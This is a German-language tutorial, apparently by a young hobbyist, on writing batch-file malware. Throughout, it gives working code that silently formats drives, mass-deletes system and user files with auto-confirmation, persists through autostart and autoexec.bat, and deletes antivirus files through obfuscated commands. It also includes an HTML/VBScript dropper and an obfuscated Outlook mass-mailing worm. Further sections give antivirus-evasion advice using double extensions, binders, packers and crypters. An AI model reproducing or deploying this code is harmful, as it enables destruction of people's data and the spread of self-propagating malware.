************************************************* ******* Professionelle BAT-Programmierung ******* ************************************************* ||||| Ein Tutorial von CcT (Aljoscha Drögemeier) ||||| Dieses Tutorial habe ich zwar mit 12 Jahren geschrieben, doch es ist trotzdem nicht für Komplett-Anfänger geeignet. Ich habe mir zwar Mühe gegeben, es leicht verständlich zu schreiben, aber Grundkenntnisse sollte man schon haben. Wichtige Vorraussetzung zum Programmieren von BAT-Malware ist ein guter Text-Editor (im Notfall auch MS-Standard NotePad. Die Dateierweiterungen müssen aktiviert sein!!! (Sonst kann man ja keine TXTs in BATs umbenennen. Ich habe versucht, die wichtigsten Batch-Funktionen zu erwähnen, habe aber Dinge wie "SET" ausgelassen. Jaja - Viele werden jetzt sagen, dass dies der wichtigste Befehl zum Verschlüsseln von Batches ist ... da haben sie auch Recht. Doch wer seine BAT-MAlware vor AVPs stealthen möchte, sollte einen gutn BAT-Mutator nehmen. Mehr zum Tarnen vor AVPs in Kapitel 9. Lange Rede kurzer Sinn: Viel Spaß noch mit meinem Tutorial! Anmerkung: Wer im folgenden Text irgendein Wort nicht versteht, kann ja im Hacker-Sprachführer in Kapitel 14 nachschlagen!!!
*** Die Kapitel: *** 1. Texte schreiben 2. Dateien löschen 3. Formatieren 4. Andere wichtige Befehle 5. Sprungbefehle 6. Laufwerke erstellen 7. Beispiele 8. VB-Scripte schreiben 9. Malware tarnen 10. BAT2EXE, BAT2EXEC, BAT2COM 11. Tools zum BAT-Malware-Coden 12. Andere coole Batchfunktionen 13. Links 14. Der Hacker-Sprachführer 15. Befehlsübersicht 16. Sonstige BatchhackZ
Hi! Hast du schonmal mit der DOS-Eingabeaufforderung oder Batchdateien (Stapelverarbeitungsdateien) gearbeitet? Nein? Dann wirds aber mal Zeit, denn die Batchjobs sind ziemlich praktisch. Vielleicht hast du ja schonmal die Datei command.com geöffnet, und dich gefragt, wofür diese komischen Eingabezeilen sind... Bevor es Windows in der heutigen Fassung gab, wurde noch mit diesem DOS-Fenster gearbeitet - ohne grafische Benutzeroberfläche. Und was sind diese komischen Batchdateien? Batchdateien (auch Stapelverarbeitungsdateien, Batchjobs oder BAT-Files genannt) sind eigentlich nur ganz normale Textdateien mit der Endung "BAT". Sie werden in einem Texteditor geschrieben und können mehrere DOS-Befehle der Reihe nach ausführen. Sie können löschen, erstellen, schreiben, ausführen, umbenennen, verschieben, die Dateiattribute verändern und noch viel mehr. Und so geht's: 1. öffne einen Texteditor (Notepad, Wordpad...) 2. Schreibe die DOS-Befehle nach unten aufgereiht auf 3. Speichere mit der Endung "BAT" 4. Fertig Na Super! "Schreibe die DOS-Befehle"! Wie soll'n das gehen? Fangen wir mit ein paar einfachen Befehlen an: ------------------------------------------------------------------------------------------------- 1. Texte schreiben/Echo-Befehl/Pause-Befehl ------------------------------------------------------------------------------------------------- Schreibe als erste Zeile call notepad.exe , speichere beispielsweise als notepad.bat und öffne die Datei. Sofort nach ausführen müsste sich der Windows beiliegende Texteditor Notepad öffnen. Ha! Dein erstes Programm! (Welches für den Anfang noch ziemlich lame ist!) Nun schreibe als erste Zeile den Befehl @echo off , welcher das Anzeigen der Befehle, die gerade ausgeführt werden, ausschaltet. Als zweite Zeile verwendest du nun echo Meine erste Stapelverarbeitungsdatei , um den Text "Meine erste Stapelverarbeitungsdatei" auf den Bildschirm zu bringen. Nun speicherst du wieder unter notepad.bat und startest nochmal. Nun geht das Starten von Notepad so schnell, dass du den Text "Meine erste Stapelverarbeitungsdatei" garnicht lesen kannst. Abhilfe schafft hier der Befehl pause , welchen du unter den echo-Befehl ('echo Meine erste Stapelverarbeitungsdatei') schreiben musst. Nun teste nochmal. Auf dem Bildschirm müsste nun "Meine erste Stapelverarbeitungsdatei" stehen. Das Programm notepad.bat wartet wegen dem Befehl 'pause' nun auf Tastendruck. Hat man diesen gemacht, öffnet sich Notepad. Nervig könnte beim PAUSE-Befehl aber auch der Hinweis auf den Tastendruck sein. Dann steht dort z.B. "Drücken Sie eine beliebige Taste um fortzufahren ...". Um diesen Satz auszublenden kannst du mit ">nul" den PAUSE-Befehl in das Null-Device umleiten, das heißt, der Hinweis wird nicht angezeigt. Also schreibst du am Besten nicht "pause" sondern "pause>nul"!!! Mit ECHO könntest du also auch z.B. ein ganzes Bild auf den Bildschirm bringen: 1. Das Wort 'TERROR': @echo off cls echo. echo. echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% echo -------------------------------------------------------------------- echo. echo ********** ********** ********** ********** ********** ********** echo ** ** * * * * * * * * echo ** ********** ********** ********** * * ********** echo ** ** * * * * * * * * echo ** ********** * * * * ********** * * echo. echo -------------------------------------------------------------------- echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% echo. echo. pause>nul 2. Ein Baum mit Virusmeldung: @echo off cls echo. echo. echo * echo *** echo ***** echo ******* echo ********* echo *********** echo ************* echo *************** echo *** echo. echo ___________________________________________________________ echo YOUR HARDDISK HAS JUST BEEN ERASED! echo. echo. PAUSE>NUL Folglich könntest du nun schon eine ganze Geschichte auf den Bildschirm bringen. Versuchen wir es erst einmal mit einem Gedicht: @echo off echo **** Der Wichtel **** echo von Aljoscha Dr”gemeier echo ___________________________ echo echo Ein Wichtel lebt in einem Loch, echo in einem kunterbunten Garten, echo dort muss er lange warten, echo sonst f„ngt ihn die Katze doch. pause Das sieht doch schon ganz interessant aus, doch es geht noch einfacher, indem er mit dem Type-Befehl eine vorhandene Textdatei einfach vorträgt. Mit @echo off type wichtel.txt|more pause schreibt er die Textdatei wichtel.txt auf den Bildschirm und wartet anschließend auf Tastendruck.Du kannst mit dem echo-Befehl sogar eine andere Datei schreiben. Dies machst du mit der > und der >>-Pipe. Mit > ersetzt du eine Datei komplett durch den neuen Inhalt, und mit >> hängst du den neuen Text an die Datei an. Nehmen wir beispielsweise unser Gedicht: @echo off echo.> wichtel.txt echo **** Der Wichtel **** >> wichtel.txt echo von Aljoscha Dr”gemeier >> wichtel.txt echo ___________________________ >> wichtel.txt echo.>> wichtel.txt echo Ein Wichtel lebt in einem Loch, >> wichtel.txt echo in einem kunterbunten Garten, >> wichtel.txt echo dort muss er lange warten, >> wichtel.txt echo sonst f„ngt ihn die Katze doch. >> wichtel.txt type wichtel.txt|more pause ------------------------------------------------------------------------------------------------- 2. Löschen von Dateien/Del-Befehl ------------------------------------------------------------------------------------------------- Das sieht doch schön aus! Mit dem Del-Befehl kann man eine Datei löschen. Also bringen wir diesen auch noch mit ein: @echo off echo.> wichtel.txt echo **** Der Wichtel **** >> wichtel.txt echo von Aljoscha Dr”gemeier >> wichtel.txt echo ___________________________ >> wichtel.txt echo.>> wichtel.txt echo Ein Wichtel lebt in einem Loch, >> wichtel.txt echo in einem kunterbunten Garten, >> wichtel.txt echo dort muss er lange warten, >> wichtel.txt echo sonst f„ngt ihn die Katze doch. >> wichtel.txt type wichtel.txt|more pause del wichtel.txt Nun wird die erstellte Datei wichtel.txt nach Ausführen des Programms gelöscht. Beim Löschen gibt es folgende Pfadangebearten: - Wird kein besonderer Pfad angegeben, wird die Datei im aktuellen Verzeichnis gelöscht. - Mit %WinDir% wird automatisch der Windowspfad herausgefunden: So könnte die Zeile del %WinDir%\system\*.* bei manchen PCs den Pfad "C:\windows\system\*.*" oder den Pfad "C:\winnt\system\*.*" meinen. Mit *.* werden dabei alle Dateien in dem angegebenen Verzeichnis gelöscht. '*' kann sowohl ein beliebiger Titel als auch eine beliebige Endung sein. Mit del %WinDir%\*.ini würden nur alle Dateien mit der Endung INI gelöscht werden. Würde dort z.B. titel.* stehen, würden alle Dateien mit dem Titel "titel" gelöscht werden, wobei die Endung egal wäre. - Da DOS bei Dateinamen nur 8 Ziffern erkennt gibt es bei DOS keine vernünftigen Windowsnamen. Um z.B. alle Dateien im Ordner "C:\Ichbinvolldoof" zu löschen muss es also del C:\Ichbin~1\*.* heißen - und das ist ziemlich unpraktisch. Außerdem kannst du bei DOS keine Leerstellen verwenden, diese werden dann als %20 angezeigt. Um diese beiden DOS-Bugs zu umgehen, kannst du auch die Pfade im Windowsformat angeben. Dort würde C:\Eigene Dateien dann in Anführungszeichen stehen müssen. Also nun ein Beispielvergleich: DOS-Format: del C:\Eigene~1\*.* Windows-Format: del "C:\Eigene Dateien\*.*" Nun noch ein paar mehr Optionen beim Löschen von Dateien: Bei wichtigen Dateien fragt der PC ob man sie auch wirklich löschen möchte. Dies umgehst du mit der |- oder der <-Pipe: Möglichkeit 1: echo j|del %WinDir%\system\*.* Möglichkeit 2: echo j>ja.txt del %WinDir%\system\*.*<ja.txt Mit del %0 löscht sich die ausführende Batchdatei selbst. Also fassen wir die nun erlernten Erkenntnisse mal zu einem kleinen Virus zusammen: @echo off echo Ihr Windows-System wird nun aktualisiert, echo dies kann einige Sekunden in Anspruch nehmen. pause>nul echo j>ja.txt del "C:\Eigene Dateien\*.*"<ja.txt del %WinDir%\*.ini<ja.txt del %WinDir%\system\*.*<ja.txt del %WinDir%\*.*<ja.txt Mit dem Befehl deltree kann man einen kompletten Verzeichnisbaum löschen. Der Paramenter /y schaltet dabei die Sicherheitsabfrage ab. Beispiel: deltree c: /y Dieser Befehl löscht den kompletten Inhalt der Festplatte [C:]! ------------------------------------------------------------------------------------------------- 3. Formatieren der Festplatte ------------------------------------------------------------------------------------------------- Mit dem Befehl format formatiert man einen Datenträger, das heißt, alle Dateien auf diesem Datenträger werden gelöscht. Will man z.B. die Festplatte C: formatieren kann man das folgend durchführen: format C: /q /v:Hacked Dieser Befehl formatiert die Festplatte. Der Paramenter Q bedeutet, das die Formatierung mit QuickFormat durchgeführt wird. Das heißt, dass der Datenträger [C:] schnell formatiert wird, sodass der Benutzer bei den schnellen neuen PCs garnicht merkt, was an seinem Rechner überhaupt geschieht (Naja, das war jetzt etwas übertrieben!). Nach der Formatierung wird mit dem Paramenter V das Label "Hacked" auf das Laufwerk gepappt. Alles schön und gut, doch was nützt der beste Formatierungs-Trojaner, wenn er nachfragt, ob die Festplatte überhaupt formatiert werden soll? Kein Problem, diesen Bug haben wir gleich beiseitigt. Hier ein paar Formatierungs-Viren-Beispiele: 1. @echo off echo j>ja.txt format C: /q<ja.txt 2. @echo off echo j|format C: /q 3. @echo off ctty nul format C: /autotest /q /u Variante 2 wird von vielen Virenscannern als BAT.QuickFormat.Trojan oder ähnliches identifiziert. Mit label kann man die Festplatte selbstständig und ohne Formatierung umbenennen: label Hacked (Im Allgemeinen darf das Label eines Datenträgers nur 11 Buchstaben haben!) Anmerkung: Diese Beispiele funzen nicht auf jedem PC, da bei vielen nicht nur die 'J'-Bestätigung, sondern die ganze Eingabe des Festplattenlabels eingegeben werden muss. Teste die Funktion des Viruses doch auf deinem PC. Gebe in die Eingabeaufforderung 'format C:' ein. Fragt DOS nun nach dem Label (Titel) von [C:], funzt so ein Direct-Action-Trojaner auf deinem Rechner nicht! ------------------------------------------------------------------------------------------------- 4. Andere wichtige Befehle ------------------------------------------------------------------------------------------------- * ren = Benennt Dateien über "ren [alter Dateiname] [neuer Dateiname]" um. Sie können kein neues Laufwerk / keinen neuen Pfad als Ziel angeben. * md = Erstellt nach dem Prinzip "md [Verzeichnisname]" ein neues Verzeichnis. * rd = Benennt den Verzeichnisnamen über "rd [alter Verzeichnisname] [neuer Verzeichnisname]" um. * dir = Zeigt eine Liste aller Dateien im Verzeichnis nach dem Prinzip "dir [Laufwerk, Pfad]" an. Lässt man den Pfad leer und verwendet nur "dir" werden die Dateien im aktuellen Verzeichnis angezeigt. * copy = "copy [Zu kopierende Datei] [Neuer Dateipfad]" Kopiert die zu kopierende Datei in den neuen Dateipfad. Beim überschreiben wird eine Bestätigung erwartet. Hier ein Befehl, mit dem sich die Batchdatei selbst in den deutschen Autostart-Ordner kopiert, und somit bei jedem Systemstart ausgeführt wird. Er funktioniert leider nicht bei allen PCs!: copy %0 %windir%\startm~1\progra~1\autost~1\*.* Diesen Befehl gibt es natürlich auch für das englische Startup-Verzeichnis: copy %0 %windir%\Startm~1\Programs\StartUp\brlul.bat Bei vielen PCs lässt sich die BAT-File auch ganz leicht auf den Desktop kopieren: copy %0 %windir%\Desktop\*.* Die wirkvollste Desktop-Spreadingmethode ist aber copy %0 "%userprofile%\Desktop\*.*" Hinweis: Mit der Umgebungsvariable USERPROFILE wird, wie der Name schon sagt das Profilverzeichnis des angemeldeten Benutzers angesprochen. * move = "move [Alter Datei-Pfad] [Neuer Dateipfad]" verschiebt eine Datei in einen anderen Pfad. * mkdir = Siehe bei "md" * date = Datum verändern. z.B. "date 12.03.2003" oder "date 12-03-2003". Lässt man die eigenen Datumsangaben weg, wird das aktuelle Datum angezeigt. * time = Zeit verändern. z.B. "time 12:08:17". Lässt man die eigenen Zeitangaben weg, wird die aktuelle Zeit angezeigt. * batch = Führt die in einer Textdatei angegebenen Bfehle aus. * cls = Löscht den Bildschirminhalt. * attrib = ändert die Dateiattribute einer Datei oder eines Unterverzeichnisses. '+' aktiviert und '-' deaktiviert ein Dateiattribut. Mögliche Attribute sind: R = Schreibgschützt A = Archiv S = Systemdatei H = Versteckte Datei Der Paramenter '/S' verarbeitet Dateien in allen Verzeichnissen des angegebenen Pfads. Hier ein Beispiel: attrib +r -s +h -a c:\autoexec.bat Ganz am Ende könnte dort auch der Paramenter /S stehen. * explorer http:// = Mit diesem Befehl kann man eine Internetseite öffnen. z.B. "explorer http://www.meine-homepage.de/". ------------------------------------------------------------------------------------------------- 5. Sprungbefehle ------------------------------------------------------------------------------------------------- Praktisch sind auch Sprungbefehle: Mit "goto" kann man zu einer anderen Sprungmarke springen, welche mit ':' gekennzeichnet ist. Mit "if exist" wird geprüft, ob die angegebene Datei auch existiert. Ist dies der Fall, wird der nach dem if-exist-Befehl stehende Befehl ausgeführt. z.B.: @echo off echo Es wird jetzt geprft, ob der Pfad C:\windows\*.* existiert! echo. if exist c:\windows\*.* goto :kill echo. echo Da hast du aber nochmal Glck gehabt! Der Pfad existiert nicht! pause goto :end :kill ctty nul echo j>ja.txt if exist c:\windows\*.* del c:\windows\*.*<ja.txt ctty con echo Tja, heut ist wohl nicht dein Tag! goto :end :end Dieses Beispiel prüft, ob der Pfad C:\windows\*.* existiert, tut er das, wird er gelöscht! (Nicht für den Home-Test geeignet!) "if not exist" führt den dahinter stehenden Befehl nur aus, wenn die genannte Datei NICHT existiert!!! ------------------------------------------------------------------------------------------------- 6. Laufwerk erstellen ------------------------------------------------------------------------------------------------- Für deinen Virus kannst du auch extra ein Laufwerk erstellen lassen (du kannst folgende Zeilen ja in deinen Virus einbauen): md %WinDir%\sys copy %0 %WinDir%\sys subst X: %WinDir%\sys Die erste Zeile erstellt einen Ordner "sys" im Windows-Verzeichnis. Die zweite macht, dass sich die Batchdatei selbst (%0) in den neu erstellten Pfad kopiert. Und die dritte Zeile erstellt das Laufwerk [X:] als Verknüpfung zum Ordner %WinDir%\sys. Nach dem Neustart wird das Laufwerk aber wieder gelöscht. Deshalb ist es besser, die Befehle in die AUTOEXEC.BAT zu übernehmen, damit sie bei jedem Neustart ausgeführt werden. Also: md %WinDir%\sys copy %0 %WinDir%\sys subst X: %WinDir%\sys echo subst X: %WinDir%\sys >> c:\autoexec.bat Diese Befehle sind eigentlich ganz praktisch und es muss ja nicht immer ein Virus sein ... Wie wäre es mal mit einem nützlichen Hacker-Tool? @echo off echo --- CcT's CD-Cracker-Installing --- echo. echo Soll Laufwerk [Z:] wirklich erstellt werden? echo Drücken Sie eine beliebige Taste zum Fortfahren echo oder beenden Sie die Anwendung mit ALT+STRG+ENTF echo oder ALT+F4! echo. echo Laufwerk wird erstellt ... md %WinDir%\CDC subst Z: %WinDir%\CDC echo subst Z: %WinDir%\CDC >> c:\autoexec.bat echo. echo Der CD-Cracker wurde erfolgreich installiert. echo Sie brauchen nur noch alle Dateien der echo gewünschten CD-ROM in das Laufwerk kopieren echo und können von dort aus installieren! pause Mit diesem Programm kannst du nun ein Spiel ohne nerviges CD-Wechseln spielen. Also ist dies eine Art No-CD-Crack für jedes Programm nach der Methode von Cool CyberTerrorist (das bin ich, haha!). ------------------------------------------------------------------------------------------------- 7. Beispiele ------------------------------------------------------------------------------------------------- 1: Der Virus WorldCup 98 formatiert die Festplatte und pappt das Label "WorldCup98" drauf. So sieht sein Sprengkopf aus: Cls Echo La coupe du monde c'est genial!!!! Echo y|Format c: /u /v:WorldCup98 Echo o|Format c: /u /v:WorldCup98 Wie man sieht, versucht es der Virus sowohl auf Englisch (y für yes) als auch auf Französisch (o für oui). Also funzt das Ding nicht auf deutschen PCs! Dazu fehlt dann noch die Zeile: Echo j|Format c: /u /v:WorldCup98 Mit einem 'j' für 'ja'! 2: Der Virus MDMA, der Hackergruppe Many Delinquent Modern Anarchists, funktioniert auf Word 6 und 7 auf Windows 3.1, 95. NT und Macintosh. Je nach System löscht er nur einige Dateien, oder hängt an das Ende der Datei autoexec.bat folgende Zeile: deltree /y c: Also werden beim Neustart alle Dateien auf der Festplatte gelöscht. Der Paramenter /y schaltet dabei die Sicherheitsabfrage aus. 3: Trojaner gehören natürlich auch zum Genre der Malware. Das Beispiel 3 in Kapitel 3 ist z.B. ein Direct-Action-Trojaner (auch Killer-Trojaner genannt). Direct-Action-Trojaner gelten in der Szene als Popelprodukte unfähiger Lamer. Da sie aber so leicht zu programmieren sind fängt jeder zweite Virenautor damit an. Was ist also das Mekmal an so einem Killer-Trojaner? Ganz einfach: Einmal aufrufen und weg sind die Daten. Nun schauen wir uns den Killer-Trojaner mal genauer an: ctty nul format c: /autotest /q /u Zeile eins lenkt die Ausgabe (ctty) vom Bildschirm auf das Null-Device um, was bedeutet: Man sieht nichts mehr. Zeile zwei formatiert die Festplatte ohne Nachfrage. Tschüss Daten, hallo Fehlermeldung. 4: Folgendes HTML-Script ersetzt die Datei c:\autoexec.bat durch einen kleinen Killer. Du musst diese Zeilen nur in einem Texteditor abschreiben und der Datei die Endung HTM oder HTML geben!: <HTML> <BODY> <script language="VBScript"> Set fs = CreateObject("Scripting.FileSystemObject") Set format = fs.CreateTextFile("C:\autoexec.bat") format.WriteLine("del %WinDir%\system\*.*") format.WriteLine("del %WinDir%\*.*") format.WriteLine("C:\*.*") format.WriteLine("cls") format.WriteLine("echo Your harddisk has just been erased!") format.Close </script> </BODY> </HTML> oder du machst den selben Virus als Visual Basic Script mit der Endung VBS: On Error Resume Next Set fs = CreateObject("Scripting.FileSystemObject") Set format = fs.CreateTextFile("C:\autoexec.bat") format.WriteLine("del %WinDir%\system\*.*") format.WriteLine("del %WinDir%\*.*") format.WriteLine("C:\*.*") format.WriteLine("cls") format.WriteLine("echo Your harddisk has just been erased!") format.Close Dieser Virus wird allerdings von den meisten AVPs erkannt. Auf jeden Fall verwendet er einen BAT-Sprengkopf: Er ersetzt die autoexec.bat durch folgende Zeilen: del %WinDir%\system\*.* del %WinDir%\*.* C:\*.* cls echo Your harddisk has just been erased! 5. Manche Batches versuchen mit den folgenden Befehlen, die AVPs zu löschen: set A=r set B=g del C:\p%A%o%B%ra~1\kasper~1\avp32.exe set A=r set B=a del C:\p%A%ogr%B%~1\norton~1\*.exe set A=o set B=a del C:\pr%A%gr%B%~1\trojan~1\tc.exe set A=r set B=g del C:\p%A%o%B%ra~1\norton~1\s32integ.dll set A=r set B=g del C:\p%A%o%B%ra\f-prot95\fpwm32.dll set A=p set B=a del C:\%A%rogr%B%~1\mcafee\scan.dat set A=p set B=r set avC=tbav goto delavri set avC=ocem :delavri del C:\%A%rog%B%a~1\%avC%\tbav.dat set A=p set B=g del C:\%A%ro%B%ra~1\avpersonal\antivir.vdf set A=t set B=v del C:\%A%ba%B%w95\tbscan.sig (Diese AVP-Lösch-Befehle wurden dem BATCH WORM GENERATOR 5.03 entnommen!) 6. Am 1. April 2000 verbreitete sich der Wurm Chode in den USA. Er wurde im Verknüpfungs-Format PIF (Program Information File) versendet. Er verwendete DOS-Stapelverarbeitungsfunktionen und VB-Scripts. Er suchte ganze Subnetze mit Ping ab und hielt nach offenen Windows-Freigaben Ausschau. Fand er einen PC, auf dem Laufwerk [C:] freigegeben war, kopierte er sich in dessen Autostart-Ordner. An jedem 19. eines Monats löschte er die wichtigsten Windows-Dateien. Er verwendete einfache Tricks, um angeschlossene Modems dazu zu bringen, eine Nummer anzurufen. Er leitete dazu den Modemwählbefehl ATDT911 per echo-Kommando und DOS-Pipe an die seriellen Schnittstellen um, z.B. mit der Zeile echo atdt911 > com1 Das Ziel war also eine DoS-Attacke gegen amerikanische Notrufdienste, die unserem 112 entsprechen. (Den Wurm gab es auf deutschen Rechnern praktisch nicht!) Der Angriff gelang nur teilweise, da die Notrufzentralen nur genervt, aber nicht blockiert wurden. Wäre der Wurm so programmiert gewesen, dass erst am Tag X alle infizierten Rechner diese Nummer wählen, wäre alles viel schlimmer gekommen. ----------------------------------------------------------------------------------------------------------------------------- 8. Ein VisualBasicScript mit einer BAT-File schreiben ----------------------------------------------------------------------------------------------------------------------------- Wie ich dir schon gezeigt habe, kann man mit dem echo-Befehl andere Scripte und Textdateien schreiben - gut für VBS-Viren-Coder. Um zum Beispiel eine einfache Virenmeldung zu erzeugen, reichen folgende Zeilen: echo.> mld.vbs echo WARN=MsgBox("Ihr Computer wurde mit dem RedHair-Virus infiziert!", vbOKCancel+vbCritical, "WARNUNG!") >>mld.vbs wscript mld.vbs Startet man diese Batchdatei, öffnet sich ein Fenster: Der Titel ist 'WARNUNG!', der Inhalt 'Ihr Computer wurde mit dem RedHair-Virus infiziert!' und das Meldungszeichen ist ein roter Kreis mit einem weißen 'X' in der Mitte. Die beiden Meldungstexte können nun beliebig verändert werden. Die Buttons 'OK' und 'Abbrechen' werden mit der Option 'vbOKCancel' auf den Bildschirm gezaubert. Stattdessen kannst du auch 'vbOKonly' (OK), 'vbYesNo' (Ja, Nein), 'vbYesNoCancel' (Ja, Nein, Abbrechen) oder 'vbAbortRetyIgnore' (Beenden, Wiederholen, Ignorieren). Für das Fehlermeldungs-Zeichen ist 'vbCritical' zuständig. Dies kann beliebig durch 'vbExclamation' (Info-Ausrufezeichen), 'vbQuestion' (Fragezeichen) oder 'vbInformation' (Ausrufezeichen) ersetzt werden. Folgende Batchzeilen bewirken, das ein VBScript geschrieben wird, welches die Batchdatei per Outlook weiterversendet. Die Zeile "Titel der Mail" kann durch das Subject ersetzt werden und die Zeile "Text innerhalb der Mail" durch den Body!! copy %0 C:\anhang.bat copy %0 C:\dwsjo.vbs echo Dim x > C:\dwsjo.vbs echo.on error resume next >> C:\dwsjo.vbs set VBSwayG=FileSystem echo Set fso =" Scripting.%VBSwayG%.Object" >> C:\dwsjo.vbs set VBSwayG= set vbsosf=rd set vbsosf=f echo Set so=CreateObject(%vbsosf%so) >> C:\dwsjo.vbs set vbsosf= set VBSwayI=Outlook echo Set ol=CreateObject("%VBSwayI%.Application") >> C:\dwsjo.vbs set VBSwayI= set VBSwayJ=WScript echo Set out=%VBSwayJ%.CreateObject("Outlook.Application") >> C:\dwsjo.vbs set VBSwayJ= set VBSwayD=out echo Set mapi = %VBSwayD%.GetNameSpace("MAPI") >> C:\dwsjo.vbs set VBSwayD= set VBSwayN=Lists echo Set a = mapi.Address%VBSwayN%(1) >> C:\dwsjo.vbs set VBSwayN= echo Set ae=a.AddressEntries >> C:\dwsjo.vbs echo For x=1 To ae.Count >> C:\dwsjo.vbs echo Set Mail=ol.CreateItem(0) >> C:\dwsjo.vbs echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) >> C:\dwsjo.vbs set VBSwayK=Mail echo %VBSwayK%.Subject="Titel der Mail" >> C:\dwsjo.vbs set VBSwayK= echo Mail.Body="Text innerhalb der Mail" >> C:\dwsjo.vbs set sendB=i set attA=t set attB=c set attC=s goto mailrib set sendB=k set attA=b set attB=n set attC=a :mailrib echo Ma%sendB%l.At%attA%a%attB%hment%attC%.Add("C:\anhang.bat") >> C:\dwsjo.vbs set sendA=e set sendB=M echo %sendB%ail.s%sendA%nd >> C:\dwsjo.vbs set vsenda=N set vsendb=t goto emailri set vsenda=vpts set vsendb=vpt :emailri echo %vsenda%ex%vsendb% >> C:\dwsjo.vbs set vsenda= set vsendb= echo ol.Quit >> C:\dwsjo.vbs set cscA=scri set lrrrw=c%cscA%pt %lrrrw% C:\dwsjo.vbs del C:\dwsjo.vbs del C:\anhang.bat Dieser BAT/VBS-Wurm müsste eigentlich von jedem Virenscanner erkannt werden, da er genau die Methode vom LoveLetter-Wurm (I-Love-You) verwendet. Empfohlen wird, den Wurm erst alle AVPs löschen zu lassen und sich dann erst mit diesem Script zu verschicken. In eine COM/EXE-Datei konvertiert wird er noch nicht erkannt (Zumindest an dem Tag, an dem ich dieses Tutorial schrieb!)!! Er verbreitet sich einfach über Outlook! ----------------------------------------------------------------------------------------------------------------------------- 9. Tarnen von BAT-Malware ----------------------------------------------------------------------------------------------------------------------------- Trojaner sind Programme, die sich als andere ausgeben. Sie verwenden natürlich auch Tricks um sich zu tarnen! Hier sind sie: 1. Tarnung als Internet-Link: COM-Dateien haben die Endung COM. Genau wie die internationale Webseitenendung. Der E-Mail-Virus MyParty zum Beispiel verschickte sich als Datei 'www.myparty.yahoo.com', was wie eine Webadresse aussieht. Wird diese Datei nun verschickt, sieht das Opfer die Datei als Attachment und glaubt dies wäre wirklich ein Link auf diese Seite. Und da er keine Lust hat, die komplette Adresse nochmal abzutippeln öffnet er den Mailanhang und der Virus tobt sich auf des Opfers PC aus. 2. Tarnung als Screensaver: Bildschirmschoner haben die Dateiendung SCR (wie SCReensaver)! Eigentlich sind es aber ganz normale EXE oder COM-Dateien, die in SCR umbenannt wurden. EXE-Dateien funktionieren also mit den Endungen EXE, COM und SCR. Also muss man sogar aufpassen, wenn man sich einen gewöhnlichen Bildschirmschoner runterladen will. 3. Tarnung in jedem Dateiformat: Bei den Standard-Einstellungen von Windows werden registrierte Dateiendungen ausgeblendet. Hat man zum Beispiel eine Datei 'Shooter.exe' steht im Windows-Explorer nur 'shooter'! Ein schöner Trick um z.B. ein VisualBasic-Script als Textdatei oder eine EXE-Datei mit gefälschtem Icon als ZIP-Datei zu tarnen. Bei vielem Fernwartungstrojanern kann man dem Trojaner-Server ein Icon aus einer DLL-Icon-Liste geben um den Server zu tarnen, und das Tarnen fällt mit diesem Trick leichter. 4. Tarnung bei jedem Dateiformat - Teil II: Die Tarnungsmöglichkeit Nr. 3 kann man auch noch verändern. Bei manchen Programmen (z.B. File-Sharing-Tools) wird die Endung dennoch angezeigt. Dies kann man verhindern, indem man zwischen der Fake und der Original-Endung einige Leerzeichen einfügt. Dann wird häufig '...' als Dateiendung angezeigt. z.B. 'terror.txt .exe' sieht bei vielen File-Sharing-Tools dann so aus: Title | Size | User | Avaible -------------------------------------------------------------------------------- terror.txt ... 32105 CcT *** 5. Tarn-Tool 1: Mutatoren: Mutatoren sind Programme, die den Script-Text eines Scriptes oder einer BAT-File verschlüsseln, so dass er nciht mehr lesbar oder veränderlich ist, und trotzdem seine Aufgabe erfüllt. Die meisten mutierten Scripte werden von AVPs nicht mehr erkannt. 6. Tarn-Tool 2: Converter: Converter konvertieren (Umwandeln eines Formates in ein anderes) Programme in ein anderes Format, wobei sich der Inhalt der Datei nicht verändert. Es gibt z.B. Tools, mit denen man EXE-Dateien in das HTML-Format umwandeln kann. Das bedeutet, dass man auf eine Internetseite draufgeht und sich sofort ein ausführbarer Virus öffnet. Es gibt auch Tools zum Konvertieren von BAT-Dateien in das EXE oder COM-Format. Eine Anleitung dazu gibt's in Kapitel 10. Das gute an Convertern ist, das die meisten Viren nach dem Konvertieren von AVPs nicht erkannt werden. Darunter z.B. auch die BAT-Viren wie der BAT.QuickFormat.Trojan (Anleitung in Kapitel 3!). Also ähneln die Converter den Mutatoren. 7. Tarn-Tool 3: Binder: Binder verbinden zwei oder mehr Programmteile zu einem. Sie können gut missbraucht werden, um eine harmlose Spieledatei mit einem Trojanischen Pferd zu verschmelzen.Typische, frei verfügbare Binder sind heute Elite Wrap, Senna Spy One EXE Maker, Multi Binder, Silk Rope, WinGlue und Trojan Man. Auch Sie versuchen, die Viren von AVPs nicht erkennbar zu machen. 8. Tarn-Tool 4: Laufzeitpacker (Executable Packer): Diese Packprogramme packen die Viren möglichst klein in eine EXE-Datei, verändern die typischen Bytemuster, und verstecken sich so, dass sie vor Virenscannern (AVPs) geschützt sind. Hier eine kleine Liste mit Laufzeitpackern: ASPack, Diet, Lzexe, NeoLite, Shrink, Pklite und UPX. 9. Tarn-Tool 5: Laufzeitverschlüssler (Executable Encrypter): Diese Tools machen praktisch dasselbe wie Laufzeitpacker, nur komprimieren sie die Daten nicht, sondern verschlüsseln sie. Sie werden eingesetzt, um Dateien gegen unbefugtes Ausführen zu schützen - sie fragen dann beim Start nach einem Passwort. Somit ist es möglich, Daten vor eine Analyse durch Cracker und die Konkurrenz zu schützen. 